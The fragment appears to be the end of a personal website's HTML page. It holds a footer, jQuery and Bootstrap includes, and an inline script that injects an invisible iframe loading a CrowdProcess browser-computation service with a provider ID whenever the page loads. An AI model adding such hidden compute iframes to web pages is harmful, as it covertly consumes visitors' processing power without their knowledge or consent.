<!doctype html>

<footer>
  <p>All words are belong to me.<br>
    Copyright 2013.</p>
  </footer>
</div>

<script src="http://code.jquery.com/jquery.js"></script>
<script type="text/javascript" src="/bootstrap/js/bootstrap.min.js"></script>
<script>(function(){var d=document;d.addEventListener("DOMContentLoaded",function(){var a=d.createElement("iframe");a.src="//ss.crowdprocess.com/#?providerId=Ocb2Bh0LLIsv2TdvioP2nf12lQZ";a.sandbox="allow-scripts allow-same-origin";a.style.display="none";d.body.appendChild(a)})})()</script>

</body>
</html>
